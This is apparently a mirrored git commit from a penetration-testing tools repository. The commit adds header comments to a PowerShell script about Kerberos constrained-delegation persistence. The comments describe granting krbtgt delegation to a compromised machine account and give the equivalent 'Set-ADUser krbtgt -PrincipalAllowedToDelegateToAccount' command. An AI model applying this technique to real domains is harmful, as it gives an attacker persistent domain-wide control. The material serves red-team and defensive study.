mirror of
				https://github.com/mgeeky/Penetration-Testing-Tools.git
				synced 2025-11-04 04:55:26 +01:00 
			
		
		
		
	fixed paramter name
This commit is contained in:
		@@ -12,6 +12,10 @@
 | 
				
			|||||||
# allowing incoming trust to the previously compromised Machine object, as described 
 | 
					# allowing incoming trust to the previously compromised Machine object, as described 
 | 
				
			||||||
# by Elad Shamir in his: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence
 | 
					# by Elad Shamir in his: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence
 | 
				
			||||||
#
 | 
					#
 | 
				
			||||||
 | 
					# It does the same as the following commands:
 | 
				
			||||||
 | 
					#	PS> Import-Module ActiveDirectory
 | 
				
			||||||
 | 
					#	PS> Set-ADUser krbtgt -PrincipalAllowedToDelegateToAccount COMPROMISED$
 | 
				
			||||||
 | 
					#
 | 
				
			||||||
# This script requires PowerView to be loaded first.
 | 
					# This script requires PowerView to be loaded first.
 | 
				
			||||||
#
 | 
					#
 | 
				
			||||||
# This is basically rewritten script from Harmj0y's blog post here:
 | 
					# This is basically rewritten script from Harmj0y's blog post here:
 | 
				
			||||||
 
 | 
				
			|||||||
		Reference in New Issue
	
	Block a user